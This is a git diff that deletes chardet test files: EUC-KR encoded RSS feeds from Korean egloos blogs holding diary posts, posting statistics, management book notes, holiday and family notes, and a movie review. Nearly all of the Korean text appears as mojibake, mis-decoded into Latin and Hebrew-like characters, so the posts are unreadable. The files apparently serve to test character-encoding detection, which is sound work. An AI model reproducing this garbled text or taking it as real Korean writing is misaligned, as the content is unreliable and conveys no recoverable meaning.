    -±׳¶§µµ ֳ¿¾ת¾מ¿ה! - ]]> -
    - ְּ±·ח ֱײְ־ְו ֵה¸® - Thu, 24 Mar 2005 13:12:13 GMT -
    - - <![CDATA[ ¹דְּ ¹«¸£ְְֽ»¶§ ]]> - http://tori02.egloos.com/939265 - - ¾מֱ¦µµ ±׳·¨°ם 10³גְ¿¡µµ ±׳·¨´.
    -
    -¾ֶ´ֿ..³»°¡ ֲֵ¾מ³×±ג ְ÷־ֵֽ ±׳·¨´.
    -
    -¹דְ÷..¾נֱ¦³× ְ ¹«¸£ְֽ´ֲ´.
    -
    -¿ְ´ֳµµ ¹דְּ ְ ¹«¸£ְֽ¾מ°¡°ם ְײ´.
    -
    -

    -
    -ְֱּ¦ ְבְּ ¿ְ°ֱצ?
    -
    -ְבְּ ¿ְ±ז ±ג´¸®°ם ְײ´ֲ ³×¿¡°װ ¹׀·ֱ¿ְ´ֲ ְת ַ׸£¸¥ °ְֽ÷..ִֶµµ?
    -
    -ְ¼¼ָק ´½ֳ ÷¸ְ..
    -
    -ַ׸£¸¥ ְת°ְֽ÷... °¥ִ¸¦ ָײ³¯¸®´ֲ ¸»?
    -
    -±׳·¡..!
    -
    -ְבְּ ¿ְֱצ ¾´ֲ ¹ד¿£ »ף³הְַ ¼¼°ט·־ ְ־µµַֿ´ֲ ¸» ְּ ¾מ±ט¾רְּ ´·ֱ¿ְ°ן ַׁ´.
    -
    -¿ֽ¼­´ֲ
    -
    -¸׃¸®¸ְֳ» ¸מ¹רְּ°ם ¹זֱ₪ִ¡ ¸רַֿ°װ ¸ֹµ· ִָ
    -
    -¾מµנ·׀°¡ »ח¶ףֱר´.
    -
    -

    -
    -¿װ¾ת³כ¶ף´ֲ ַ¥½ֳ¸¦ ³²±הֳ₪·־...
    -
    -
    -

    -
    -¸»¶ֻ ~
    -
    -¸»¶ֻ~
    - ]]> -
    - ְֿ·¯½÷ֶ®·¹ְּ¼ַ - Sat, 19 Mar 2005 01:47:31 GMT -
    - - diff --git a/chardet/tests/EUC-KR/willis.egloos.com.xml b/chardet/tests/EUC-KR/willis.egloos.com.xml deleted file mode 100644 index be6a6d9..0000000 --- a/chardet/tests/EUC-KR/willis.egloos.com.xml +++ /dev/null @@ -1,203 +0,0 @@ - - - - - About willy - http://willis.egloos.com - ְ׸®ְַ µ־¼­¾ר´ֲ ±¸נְ½ - ko - Tue, 17 Jun 2003 12:24:26 GMT - - About willy - http://pds.egloos.com/logo/1/200306/17/24/a0000024.jpg - http://willis.egloos.com - 80 - 80 - ְ׸®ְַ µ־¼­¾ר´ֲ ±¸נְ½ - - - <![CDATA[ 2005³ג ³» ְּ±·ח °ב»ך ]]> - http://willis.egloos.com/1219562 - -

    1. ֶק½÷ֶ® : 170°³

    13
    stat_graph
    13
    stat_graph
    12
    stat_graph
    19
    stat_graph
    19
    stat_graph
    19
    stat_graph
    14
    stat_graph
    15
    stat_graph
    15
    stat_graph
    14
    stat_graph
    9
    stat_graph
    8
    stat_graph
    1¿ש 2¿ש 3¿ש 4¿ש 5¿ש 6¿ש 7¿ש 8¿ש 9¿ש 10¿ש 11¿ש 12¿ש

    2. µ¡± : 798°³

    39
    stat_graph
    31
    stat_graph
    80
    stat_graph
    91
    stat_graph
    171
    stat_graph
    100
    stat_graph
    66
    stat_graph
    49
    stat_graph
    71
    stat_graph
    49
    stat_graph
    33
    stat_graph
    18
    stat_graph
    1¿ש 2¿ש 3¿ש 4¿ש 5¿ש 6¿ש 7¿ש 8¿ש 9¿ש 10¿ש 11¿ש 12¿ש

    3. °·ֳ± : 25°³

    1
    stat_graph
    3
    stat_graph
    7
    stat_graph
    1
    stat_graph
    3
    stat_graph
    2
    stat_graph
    2
    stat_graph
    2
    stat_graph
    2
    stat_graph
    0
    stat_graph
    2
    stat_graph
    0
    stat_graph
    1¿ש 2¿ש 3¿ש 4¿ש 5¿ש 6¿ש 7¿ש 8¿ש 9¿ש 10¿ש 11¿ש 12¿ש

    4. ³»ְּ±·ח ±ג³׳½÷

    - ]]> -
    - ¹ּ÷׀·ש - Fri, 30 Dec 2005 06:48:38 GMT -
    - - <![CDATA[ ְ§±ג´ֲ ְ§ַטַׁ ±גָ¸ ? ]]> - http://willis.egloos.com/1218631 - - ֵַַֽ µו·¯ִ¿, CEOְַ 8°¡ֱצ ´צ¸ס
    -ֵַַֽ µו·¯ִ¿ ¿ ֱצְ½, ְּ¼צ¿µ ¿ֵ±ט / ½ֳ´כְֳַ¢
    -
    -(÷»¹® ֱ).. ָ¿ְ²ְְ־ °ז¿µְµיְ÷ ¹®ֱ¦ ַ״°בְּ ¾ֶ¹«¸® ֱ¿הַֿ´°ם ַ״µµ ±׳°ְֽ÷ °בִ °ב°ת¸¦ µו·¯³»ֱצ ¾´ֲ´´ֲ »ח½ְַ» ¾ֻ°ם ְײ´. ¹®ֱ¦ְַ ַ״°בְ÷ ¼ױַ״¸¦ ¿¹¹זַׂ »׃ ±׳ ְּ»ףְ÷ ¾ֶ´ֿ´. ±׳¿¡ ¹ַ״ ¿©·¯°¡ֱצ °¡´ֹ¼÷ְ» ֳ¶ְתַֿ°װ ְּ¿כַֿ´ֲ °ְֽ÷ ÷׀¸ם °ב°ת¸¦ ְּ²ר¾מ³½´.
    -
    -ְ¯´ַֹׁ °ז¿µְµיְ÷ ¹«¾ש÷¸´ ÷¯ָ­¸¦ ְ§ַטְּ ¾ֶ´ׁ ±גָ¸·־ ִֶ¾ַַׁ´. ±׳µיְ÷ ±ג¾ק ³»¿¡¼­³× ¿÷־¿¡¼­³× ֳ¼°טְְ¸·־ ÷¯ָ­¸¦ ֳ±¸ַֿ°ם, "¿ל¸®°¡ ¾מ¶»°װ ַֿ¸י ְּ·± ְת·± ÷¯ָ­¸¦ ¿ל¸® ±ג¾קְ» ְ§ַׁ ±גָ¸·־ ְּ¿כַׂ ¼צ ְײְ»±מ?" ¶ף°ם ¹¯´ֲ´.
    -
    -ְּ»ףְְ־ °ז¿µְµיְּ ±גָ¸·־ ְ־½ִַֿ´ֲ ÷¯ָ­¿¡´ֲ ´ְ½ְַ ְֿ°צ°¡ֱצ ¿µ¿×ְּ ֱ¸ְחַׁ´.
    -
    -* ְ±ג ±ג¾קְּ³× °זְן ±ג¾ק, ¶ַ´ֲ ְֳ¼ »ך¾ק ÷׀¾ְַ ¿¹±גִ¡ ¾ְ÷ ¼÷°רְּ³× ½ֶַ׀
    -* ַֿ³×ְַ ֱ¦ַ°ְּ³× ¾ק¹« ¼צַא, ¶ַ´ֲ ½ְֳו°ת °·ֳַ״ ½ֱַ¦ ַצ½ַ°ת ´חְ§¼÷ְ¸·־¼­ ַצ½ַ »חְּ¿¡¼­ ³×ֵ¸³×´ֲ ´ְ‎
    -* ±ג¾ק ³»÷־³× ¿÷־, ¶ַ´ֲ ְֳ¼ »ך¾ק¹®¾¿¡¼­ ְּ·ח¾מֱר »‎»ך °תֱ₪°ת »‎»ךַ°, ¾ק¹« ¼צַאְַ ַץ½ֵ
    -* ְֳ¼ »ך¾ק ÷׀¾³× ½ְֳו ³»¿¡¼­ְַ ±¸ֱ¶ ÷¯ָ­
    -* ְ־±¸ֵכ°טַ׀ְ ¿הְ־µי
    -* »ח°ם¿ֽ °¡ִ¡, ֱצ°¢, ÷׀ְ§±ג, ¶ַ´ֲ ְַ¹ְַּ ÷¯ָ­
    -* »ץ·־¿מ ֱצ½ִ°ת »ץ·־¿מ ֵ׳ֵ©³מ·־ֱצ
    -
    -
    -
    CEO ִ×±ג½÷ִ­ - ְ¯¸ס¹־¿¡°װ ¹ט¿ל´ֲ 21¼¼±ג °ז¿µְ·«
    -±טֱ¾·¡ (ֱצְ÷ְּ) | »ן¼÷°זֱ¦¿¬±¸¼ׂ
    -
    -ָ°¡ֱ¿¡ ְ׀¾מ÷¼¸¸ַׁ ֶקִֿ»חְֱּמ ÷ֿ.
    -
    -÷¯ָ­¿¡ ְְְַֿ´ֲ °ְּֽ »‎ֱ¸ְַ ¹®ֱ¦¿´´ר ְ¯¸ס¹־, ֶעµמַֿ°ם °רֱ₪ַׁ »ף¹תֱ₪ֳ¥, ½ֵ±ג¼ת¿¡ ´כַׁ ֱ¸ֱ, ¿÷־ְַ ¹®ָ­¿ֽ ±ג¼ת¿¡ ´כַׁ ¿ְֲַ¸¶ְ־µו, ֱ₪÷¸ְַ ֱ¿ה¼÷°ת ¼׃µµ¿¡ ´כַׁ ְ־½ִ, °ר°³µַ°ם ½ֵ·¸¦ ¹ְֱֵ¸·־ַֿ´ֲ ִ¿¹ֲ´ְִֹּֿ¼ַ µמ 21¼¼±ג¿¡ µי¾מ¼­ ÷־°¢µַ´ֲ ְ¯¸ס¹־µיְַ »‎ֱ¸¹‎ִ¢. - ]]> -
    - - Books - Thu, 29 Dec 2005 06:29:07 GMT -
    - - <![CDATA[ ָ¸½ְִַ °טְ‎2¼¼ ]]> - http://willis.egloos.com/1218503 - -
    ָ¸½ְִַ °טְ‎2¼¼÷ל½÷ֱַ¸µ ַַ½¬ְֶ ¼³גָ¸½ִ - -
    - ]]> -
    - ¹ּ÷׀·ש - Thu, 29 Dec 2005 03:19:15 GMT -
    - - <![CDATA[ ָ¸½ְִַ °טְ‎¹יµ־ ]]> - http://willis.egloos.com/1217852 - -
    ָ¸½ְִַ °טְ‎¹יµ־»ך ¿µֱצ¼ת ¸ְ÷¸°ם ¾ֻ·ֱ µו¸®ֱׂ - -
    - ]]> -
    - ¹ּ÷׀·ש - Wed, 28 Dec 2005 09:15:45 GMT -
    - - <![CDATA[ ֵ©¸®½÷¸¶½÷¿£ ¼₪ֶהְ־ְ» ¸¶½ֳ´ֲ °ַ°¡ ÷¸±÷¿ה. ]]> - http://willis.egloos.com/1211975 - - -
    -ֵ©¸®½÷¸¶½÷¿£ ¼₪ֶהְ־ְ» ¸װ´ֲ °ֵ¶ף°ם ַױ´ֿ´. ֳ³ְ½ ¾ֻ¾ׂ½ְ´ֿ´ -_-; ֶע¼ׂ¿¡ ָ¸½ִ¶§´ֲ ¸ֱֶײ³× ¼ֱׂײ, ֱ‎¿¡¼­´ֲ ¹ה¸װְ» ¶§ ¹ֱײ·־ ±¹»ך ֱר·־ֶקµµֱײ¸¸ ¸¶¼ּ´ֲµ¥ ¼₪ֶהְ־µµ ³×¸§´כ·־ ¸ְְּ ְײ±÷¿ה.
    -
    -ְּ¹ר ֵ©¸®½÷¸¶½÷¶§¿¡ ¼₪ֶהְ־ ַׁ÷´ »ח¼­ ֳ³¿ֽ ¸¶¼ֵ¾ °½ְ´ֿ´.
    -Merry Christmast & Happy New Year~!
    -
    -ְ׸®.
    -
    -
    -
    -
    - ]]> -
    - - Diary - Wed, 21 Dec 2005 07:52:46 GMT -
    - - <![CDATA[ ֱרָ£ ¾צ¸¶ ¸יַדµ´~! ]]> - http://willis.egloos.com/1206459 - - -
    -¿¬½ְ¿כְ¸·־ ֱ°ם ¼ֲַׂק ַׁ´כ¸¦ »חֱײ¾מ¾ °½ְ´ֿ´. ±׳°£ ¿מְְ» ֱַֿצ ¸רַ״ ¸¹ְּ ¸ר ´´ׁ °ְֽ» ¾ֶ½¬¿צ ַ´ֲµ¥ ְֱּ¨ ¹° ¸¸³­ °ם±גֳ³·³ ¾ְֶּµי µ¥¸®°ם ְ µ¹¾ֶ´´ׂ °ְֽ¸·־ »‎°¢ַױ´ֿ´.
    -
    -»ח°ם¾רְּ ¾ְַָֿ°װ ְ ´´ֿ±ג¸¦ ¹·¡÷¾´ֿ´. - ]]> -
    - - Family - Thu, 15 Dec 2005 01:40:12 GMT -
    - - <![CDATA[ ֵ©¸®½÷¸¶½÷°¡ ´°¡ ]]> - http://willis.egloos.com/1204099 - -
    ֵ©¸®½÷¸¶½÷°¡ ´°¡¿װ±÷¿ה ָ¸»ח¿¡ µמְוַׁ ְו½ִ! - -
    - ]]> -
    - ¹ּ÷׀·ש - Mon, 12 Dec 2005 09:23:29 GMT -
    - - <![CDATA[ ֳ¹´« ³»¸° ³¯ ]]> - http://willis.egloos.com/1196836 - -
    -
    -ֱ¦´כ·־ ֳ¹´«ְּ ³»·ָ±÷¿ה. ֱ‎¿¡¼­ ÷» ַ³°זְװ´ֿ´.
    -
    -¾מֱ¦´ֲ ֱרָ£¿ֽ µְּׁ¼­ ְה½ְ´ֿ´. ֱרָ£ ¾צ¸¶´ֲ ֳ³ֱ¦³׳ ֱ‎¿¡¼­ ¸׃¸® ַׁ´°ם °¡¼­ ¼­¿¬ְּ¶ ְ°ם ְת¸¸ ֱרָ£¿ֽ ְה³׳¿ה.
    -
    -ֱ‎¿¡ ¿ֽ¼­ ֱרָ£¿ֽ ֳא±¸ ֶַַׁ ַֿ°ם (½ַ·ְֲּ ֱ» ´ֳ¾ת´ץ±÷¿ה. ^^) ֱרָ£°¡ ֱֱ¾ֶַֿ´ֲ ¶ף¸י¿¡ ¹ה ¸»¾ֶ¼­ ֱײ´ֿ ַׁ±׳¸©ְ» ¶ׂµ ÷ס¿½ְ´ֿ´. ¾צ¸¶¿¡°װ´ֲ ÷ס¹׀·־ ַֿ¶ף°ם ַױ´ֿ´. ¾צ¸¶°¡ ¶ף¸יְ» ¸ר ¸װ°װ ַֿ°ֵµח¿ה. ^^ - ]]> -
    - - Diary - Sun, 4 Dec 2005 02:02:21 GMT -
    - - <![CDATA[ °ְַּ µ¹ְִ¡ ]]> - http://willis.egloos.com/1196826 - -
    -

    -
    -

    -
    -ִּ·־´װְַ ¾ֶµיְ־ °ְְַַּ µ¹ְִ¡°¡ ֵה¿הְֿ³¯ ְײ¾ת½ְ´ֿ´. ¿ְ·¨¸¸¿¡ ֱרָ£¿ֽ ֱ״ְּµµ ¸¸³µ±¸¿ה. ¾ף¸¶ְ °בָ¥ַֿ½ֵ °¡ְּµµ ¿ֱֽײ¾ת½ְ´ֿ´. °¡ְּ°¡ ¾ֹ°ם ְײ´ֲ ¿¹» ¾ְֶּ´ֲ ÷¸°ֵ½÷´װְַ ֳ₪¿¬ְּ ^^ - ]]> -
    - - Diary - Sun, 4 Dec 2005 01:43:29 GMT -
    - - <![CDATA[ BSC °ז¿µ ]]> - http://willis.egloos.com/1191561 - - -CSF  : Critical Success Factor
    -KPI  : Key Performance Indicator
    -
    -
    -* BSC ְ‎ֲק
    -ֳ¥ְ׃ ¾ק¹« ¼±ֱ₪ -> ַ½ֹ ¼÷°ר ¿הְ־ְַ µµֳג (CSF) -> ַ½ֹ ¼÷°ת ֱצַ¥ ֳֳג (KPI) -> ¼÷°תֱצַ¥ Dashboard -> ¸נ´ֵֽֿ¸µ, Feedback
    -
    -
    -* ֶע°¡ְַ ±גֱ״
    -1. ½ֵ·¼÷, Reliability
    -2. ֵ¸´ח¼÷, Validity
    -3. ³³µז¼÷, Acceptability
    -
    ----------
    -
    -¾ק¹«´ֲ ´ץ¿ם ÷‎÷‎ַ״ֱצ°ֱצ¸¸ ÷׀¸ם ַ¿הַׁ ֱַ·־¼¼½÷ְ־µם.. - ]]> -
    - - Work - Mon, 28 Nov 2005 01:29:49 GMT -
    -
    -
    diff --git a/chardet/tests/EUC-KR/xenix.egloos.com.xml b/chardet/tests/EUC-KR/xenix.egloos.com.xml deleted file mode 100644 index 2da1f46..0000000 --- a/chardet/tests/EUC-KR/xenix.egloos.com.xml +++ /dev/null @@ -1,379 +0,0 @@ - - - - - ¢ֶ ֱ¦´׀½÷ְַ »ח°ם¹¶ִ¡ ¢ֶ - http://xenix.egloos.com - ֱ³גֵ½ֱ₪ ֱ¦´׀½÷ - ko - Sat, 18 Oct 2003 10:55:16 GMT - - ¢ֶ ֱ¦´׀½÷ְַ »ח°ם¹¶ִ¡ ¢ֶ - http://pds1.egloos.com/logo/1/200509/29/67/a0004367.jpg - http://xenix.egloos.com - 80 - 149 - ֱ³גֵ½ֱ₪ ֱ¦´׀½÷ - - - <![CDATA[ 2005³ג ³» ְּ±·ח °ב»ך ]]> - http://xenix.egloos.com/1219737 - -

    1. ֶק½÷ֶ® : 462°³

    38
    -stat_graph
    32
    -stat_graph
    51
    -stat_graph
    50
    -stat_graph
    39
    -stat_graph
    40
    -stat_graph
    42
    -stat_graph
    37
    -stat_graph
    42
    -stat_graph
    36
    -stat_graph
    30
    -stat_graph
    25
    -stat_graph
    1¿ש2¿ש3¿ש4¿ש5¿ש6¿ש7¿ש8¿ש9¿ש10¿ש11¿ש12¿ש

    2. µ¡± : 6317°³

    509
    -stat_graph
    417
    -stat_graph
    721
    -stat_graph
    709
    -stat_graph
    396
    -stat_graph
    501
    -stat_graph
    545
    -stat_graph
    576
    -stat_graph
    486
    -stat_graph
    555
    -stat_graph
    555
    -stat_graph
    347
    -stat_graph
    1¿ש2¿ש3¿ש4¿ש5¿ש6¿ש7¿ש8¿ש9¿ש10¿ש11¿ש12¿ש

    3. °·ֳ± : 517°³

    41
    -stat_graph
    41
    -stat_graph
    87
    -stat_graph
    60
    -stat_graph
    28
    -stat_graph
    55
    -stat_graph
    27
    -stat_graph
    45
    -stat_graph
    33
    -stat_graph
    51
    -stat_graph
    26
    -stat_graph
    23
    -stat_graph
    1¿ש2¿ש3¿ש4¿ש5¿ש6¿ש7¿ש8¿ש9¿ש10¿ש11¿ש12¿ש

    4. ³»ְּ±·ח ±ג³׳½÷

    ¢ׁ 2005³ג ³»ְּ±·ח °ב»ך ַֿ·¯°¡±ג - ]]> -
    - ¹ּ÷׀·ש - Fri, 30 Dec 2005 09:54:49 GMT -
    - - <![CDATA[ ÷ם·־±׳ ֱ¾¹«½ִ. ]]> - http://xenix.egloos.com/1218006 - - -¾מ¶»°װ ֱ¦ ÷ם·־±׳´ֲ ָסַַֿׁ°װ ¸ֵ³ג ֱײµָ ֱײֱ¦°¡ ¹²מ´ֲ°ֽ °°½ְ´ֿ´¸¸..
    -±׳·³¿¡µµ ÷ׂ°םַֿ°ם ְּ·¸°װ ²ֱ״ָק ֳ£¾ֶ ֱײ½ֳ´ֲ ÷׀µיְ÷ ְת¸¦ µ¶ף °½ֹ»ח°¡ ÷¯ַֿ½ֳ´ֲ °ַ°¡¿ה..;;
    -°½ֹ»ח±מֱצ ¹²ד°¡¸ח ֳ£¾ֱֶײ½ֳ´ֲ ¿©·¯÷׀µי²² ´½ֳַׁ¹ר °¨»ח µו¸³´ֿ´. : )
    -
    -¿ֳַ״ ְּ°קְַ °¡ְו ֵ« ÷¯ָ­´ֲ ¾ֶ¹«·¡µµ ¾ף¸®¾מ´נֲֵֽ ±ְּ ¸¹¾ֱֶ³´´ֲ ֱ¡°ת
    -"Xenix Review" ¶ף´ֲ ִ³±מֱצ ¸¸µי¸¸ֵ­ ¸®÷ה ְ¼÷ְּ ¸¹¾ֱֶ³´´ֲ ֱ¡ְ» µי ¼צ ְײ°³׳¿ה.
    -±׳´צ÷׀¿¡ ±׳°£ ¸נ¸£´ר »ץ·־¿מ °ֽµיְ» ¸¹ְּ ֱ¢ַ״÷¼ ¼צ ְײ¾ת½ְ´ֿ´.
    -
    -¶ַַׁ, ÷ם·־±כ ½ְֳ ְ¿¡´ֲ ֱ¦°¡ ַׂ ¼צ ְײ´ֲ ְְֿ÷ ֱַ·־±׳·¡¹ײ°ת °װְ׃ »׃ְּ¶ף°ם »‎°¢ ַ´ֲµ¥,
    -÷ם·־±כְ» ½ְֳַׁ ְִָּ·־, 2004³ג ±מֱצ´ֲ ְּ°ק ְת°ק¿¡ ±µµ ¾²°װ µַ°ם,
    -2005³ג ¿¡´ֲ ֱ₪¸» ¹ּ¼קַװ¿¡µµ ÷ׂ±¸ַֿ°ם ±גָ¹ְ & ¸®÷ה¾מ ·־µµ ָ°µ¿ַׂ ¼צ ְײ¾ת½ְ´ֿ´.
    -
    -÷ם·־±כ ְּ¶ף´ֲ °ְֽ÷ ְת¿¡°ױ ֱ₪¸» ¸¹ְ÷°ְֽ» °¡¸£ֳִ ֱײ°ם, ¸¹ְ÷ ±גָ¸¸¦ ֱײ´ֲ°ֽ °°½ְ´ֿ´.
    -
    -¸מְֿ ³²±ה ֱַצ¸¸ ÷ם·־±׳¿¡ °½ֹ ²פ°ם ¸¶ְ½²¯ ¼תµµ ֱ» ¸¶½ֳ¸ח ָ½ְִַ ½ֳ°£ְ» °®°םְ ַױ´ֿ´. ¿ְ´ֳ ְִָּ·־ ¹»ְֿµµ ֱ» ְײ°ם, »ץַ״¿£ ´ץ¿ם ¿­½ָֹק ַׂ ¼צ ְײµµ·ֿ ֳזְְַ ½ֳ°£ְ» °®±ג ְ§ַ״ ¸»ְֱּׂ : )
    -
    -»ץַ״ »ץ·־¿מ ַ״°¡ ¶¸י »ץ·־¿מ ¸¶ְ½ְ¸·־ ´½ֳ ְ־»ח µו¸®°½ְ´ֿ´.
    -¿ֳ ַַׁ״µµ ¸נµ־ °ם»‎µי ¸¹ְ¸¼ּ±¸¿ה. ¸מְֿ ¾ָ³²ְ÷ 2005³ג ¸¶¹«¸® ְ ַֿ½ֳ±ג ¹¶ר´ֿ´. - ]]> -
    - ¢ֶ ם»ח°ם ¢ֶ - Wed, 28 Dec 2005 13:05:37 GMT -
    - - <![CDATA[ ¿ְ´ֳ ¿¬±״ ֶ¼ִֿ ¹«·ב·־ µו¸³´ֿ´. (³¡) ]]> - http://xenix.egloos.com/1216035 - - [ ÷ף¹ז ְײ½ְ´ֿ±מ °ר½ִ ָ¨ֶהְֱּצ ]
    -
    -ָז.. ְ־ֱ₪ַֿ±ה ½ֱָצ¸¸, ¿¬±״ ֶ¼ִֿ ¾חµµ ַױ´ֿ´.
    -÷ם·־ֱר ְּ÷¥ֶ®¿¡ ´חֳ· µַ¾מ¼­ ¿ר·¡ ¿ְ´ֳ ÷¸·ֱ°ם ַ´ֲµ¥ ³¹« ְ½ֵ ¸¸¸¸ ַ´ר ֵ¿ְ־ֱצ.
    -ַׁ ַׁ½ֳ°£ ְֲכ÷־ֵֽ ¿©±גְת±ג ְָ­¸¦ ַ״÷ֳ´ֲµ¥..
    -
    -'¿ְ´ֳ ¸נְ׃ְײ¾מ..' ,
    -'ְְ ³²ְִ£±¸ ¸׃¸®ַֿ´ֲµ¥ µ¶ף¿װ´ֲµ¥..',
    -'¾א¼׃ ְײ´ֲµ¥ ±ת±ג°¡ ֱ» ±׳·¯³׳..'
    -'ְְ ְְּֿ ֱ» ´°װ ³¡³¯°ֽ °°¾ֶ..'
    -
    -'ֱצ± °ֵ½ֵ ְָ­´ֲ °ם°´ְַ »חֱ₪ְ¸·־ ´ח÷׀°£ ֲר½ְֵּ ֱ₪ֱצµַ¾ת½ְ´ֿ´.'.........orz
    -
    -ִָ.. ְ־»‎ ַך»ל¾ׂ¾ֶ¿ה _-_
    -
    -¾מֲ·µח ְּ·¯ַׁ °°ט·־ ¿¬±״ֶ¼ִֿ ¾חµµ ַױ´ֿ´.
    -µ־½ֳ°£ µְ־ ¿ְ´ֳ ¿ְִָ ¿©´½ֳ °ר¿¬ְּ±¸¿ה.. ְו¼ׂ´ֲ ַ‎ָ­¿× 2¹ר ֳג±¸ ±ֳ³ ְװ´ֿ´.
    -
    -´ח¿¬ָק µ־ְוְּ±¸¿ה.. µ¡±·־ ½ֳֵ»ַ״ ֱײ½ֳ¸י °¶ק ¹ז¹‎ְ» ¾ֻ·ֱ µו¸®°½ְ´ֿ´.
    -
    -ֱ¦°¡ ְ־ֳµ »ח´ֲ °°ט·־ ÷¸·ֱ¸י ´¾מµµ 20~30÷׀ ¾ָ¿¡´ֲ ֳג¹ְ» ַ״¾ ַֿ´ֲµ¥.
    -¹¹, ±׳¾ָ¿¡ ְת¿ֽ ַװ²² ¿¬±״ְ» ÷¸°ם ½ֽ´´ֲ ¾ֶ¸´´¿מ ¿©¼÷÷׀²²¼­ ½ֳֵ»ְ» ַ״ֱײ¼ֵµµ ֱֱ½ְ´ֿ´.;;
    -
    -³¡³µ½ְ´ֿ´. - ]]> -
    - ¢ֶ ם»ח°ם ¢ֶ - Mon, 26 Dec 2005 08:59:25 GMT -
    - - <![CDATA[ °­ַׁ ¿µָ­ 'ֲֵַ³' ]]> - http://xenix.egloos.com/1215600 - - ֱ₪¸» ³¹«³×µµ ±ג´כַֿ´ר ¿µָ­, ֲֵַ³ְ» µוµנ¾מ °¶ק ַ½ְ´ֿ´. 'ִ£±¸' ¿¡¼­ ³¹«µµ ´כ´ַׁ °¨µ¶ְ¸·־ »‎°¢ַ´ר °°זֳֵ °¨µ¶ ְּ¾תֱצ¸¸, 'ֳ¨ַַ¾נ'¿¡¼­ ¾מ´ְֱ₪µµ ½ַ¸ְֱ» ַֿ°ם '¶ֻ°³' ´ֲ ¾ֱֶק ÷¸ֱצµµ ¸רֱַצ¸¸, ְּ 'ֲֵַ³' ְּ¶ף´ֲ ¿µָ­´ֲ ֳ³ְ½ ֶק½÷ֵֽ¸¦ ÷ְֳ»¶§ ¹·־ ²ַָפ ¹צ·ָ½ְ´ֿ´.
    -
    -ֱ¦°¡ ְּ ¿µָ­¿¡ ±ג´כ¸¦ ַ´ר °¡ְו ֵ« ְְּ¯´ֲ, 200¾ן¿רְַ ֱ¦ְ÷סµµ, 'ֲֵַ³' ְּ¶ף´ֲ ¹÷°¡ ְײ¾מ÷¸ְּ´ֲ ֱ¦¸סµµ ¾ֶ´ׁ ¹·־ 'ְוµ¿°ַ' ְּ¶ף´ֲ ¹ט¿ל ¶§¹® ְּ¾ת½ְ´ֿ´. ְת´ֲ 'ְוµ¿°ַ' ¾¾¸¦ ¹«ֱצַֿ°װ ֱֱ¾ֶַױ´ֿ´. °¡ְו ֱֱ¾ֶַֿ´ֲ ¹ט¿ל¸¦ ¾ך±גַ״ ÷ֱ¶ף ַֿ¸י ¿©ְ¹ט¿ל´ֲ ֱ» ֱײ±גְְ¸·־ ¹²מ´ֲ °זַגְּ ְײ´ֲµ¥ (ֱצ±ְ÷ ±טֲֵָס¾¾¿¡ ²ָָק°ם ְײ´ֱֲ) ³²ְ ¹ט¿ל´ֲ ²ֿ ¿ְ·¡ְ÷־ֵֽ 'ְוµ¿°ַ' ¾¾ ¿´½ְ´ֿ´.
    -
    -°םµמַ׀±³¸¦ ´´ׂ¶§ֲכ ¿©ְַµµ¿¡¼­ ְוµ¿°ַ¾¾°¡ ¹÷°¡¸¦ ֳװ¿µַֿ°ם ְײ´ֲ°ֹ ַׁ¹ר ÷»ְְּ ְײ´ֲµ¥ °¡±מְּ¼­ ÷¸´ֿ ֱ₪¸» ³²ְ°¡ ÷ֱµµ 'ֱ¶°¢' ְּ¶ף°ם ַׂ¸¸ַׁ ¿¸נ ´ץ¶ף±¸¿ה. °ֵ±ג¿¡, ¿הֱע ֲַׁ ¹°ְּ ¿ְ¸£°ם ְײ´ֲ ¼ׂ¸§ְּ µ¸ְ» ֱ₪µµְַ ¿¬±ג·ֲ°ת ±׳°£ ֲ µי¾מ¿ֲ ¾ך±גµיְּ ְ־°£ְְ¸·־µµ »ף´חָק ±¦ֲת°ם ¿­½ָֹק ַֿ´ֲ »ח¶קְּ¶ף´ֲ°ֹ ¸»ַ״ֱײ°ם ְײ¾מ¼­ ְוµ¿°ַ¾¾¸¦ °³ְ־ְְ¸·־ ¾ֱֶײ ֱֱ¾ֶַױ´ֿ´.
    -
    -¾מֲ·µח, ±׳ ְוµ¿°ַ¾¾ְַ »ץ¿µָ­¶ף´ֲ »ח½ַ ¸¸ְ¸·־µµ ֳז÷׀ָק ±ג´כ°¨ְ» ÷ׂ·¯ ְְֿ¸ִ׳°ם, °ֵ±ג¿¡ ְוµ¿°ַ¾¾¿ֽ °°זֳֵ °¨µ¶ְּ ´½ֳ ¸¸³µ´´ֲµ¥¿¡ ´ץ ֵ« ±ג´כ°¨ְּ »‎°וְ¸¸ח ְִֹּ÷ם TV OCN ¿¡¼­ ¿µָ­ ֶַׁם ³×¿ְ´ֲµ¿¾ָ ´כ¿©¼¸¹ר¾¿ ³×¿ְ´ֲ 'ֲֵַ³' ְַ ±₪°ם.. °ֵ±ג¿¡ ְוµ¿°ַ¾¾°¡ ¹ט ְ§¿¡ ¼­ְײ´ֲ ¸נ½ְְּ ֱ₪¸» ְּ ¿µָ­¸¦ ÷¸°ם½ֽ¾מ ¹ִּ¡µµ·ֿ ¸¸µי¾ת½ְ´ֿ´.
    -
    ָ®½ַָק ¿µָ­´ֲ ֱֱ¾ׂ½ְ´ֿ´. ְֱּ₪ְח¾¾µµ ¸ֱ³°ם, ְוµ¿°ַ¾¾ְַ ִ«¸®½÷¸¶´ֲ ¿µָ­ ½÷ֵה¸®°¡ ±׳´ֱצ ´כ´ַׁ ½÷ֵה¸®°¡ ¾ֶ´ֿ¾תְ½¿¡µµ ÷ׂ±¸ַֿ°ם ½÷ֵ©¸°¿¡¼­ ַׁ½ֳµµ ´«ְ» ¶¿ ¼צ ¾רְ» ֱ₪µµְַ ¸פְװµµ¸¦ ¸¸µי¾מ ³ֲ½ְ´ֿ´.
    -
    -ֱַֿצ¸¸, ¿µָ­°¡ ָלְגְ»µ¥ ¾רְּ ¿ֿ÷®ֱַֿצ´ֲ ¾¾ׂ½ְ´ֿ´. ֵ»÷ְֿ¸¦ ְּ¿כַׁ ½ְִֵֶ ¿ה¼ׂµיְ» °תַֿ°װ »נְװַֿ¿© ¾ןֱצ·־ ´«¹°ְ» ְ¾ֶ³»·ֱ´ֲ ¿ה¼ׂ°¡ ֱ» ÷¸¿´°ם, ְֱּ₪ְח¿ֽ ְוµ¿°ְַַ °°טְַ ֱרְ ְֳ¼µµ ֱ» ±¹ַֿ°װ ְּ·ןֱ® ֱרַאְּ ³¹« ÷¸¥°ְּֽ ¾ֶ´ׁ°¡ ַֿ´ֲ »‎°¢ְּ ֱ¾ֱ¾ µי¾ת½ְ´ֿ´.
    -
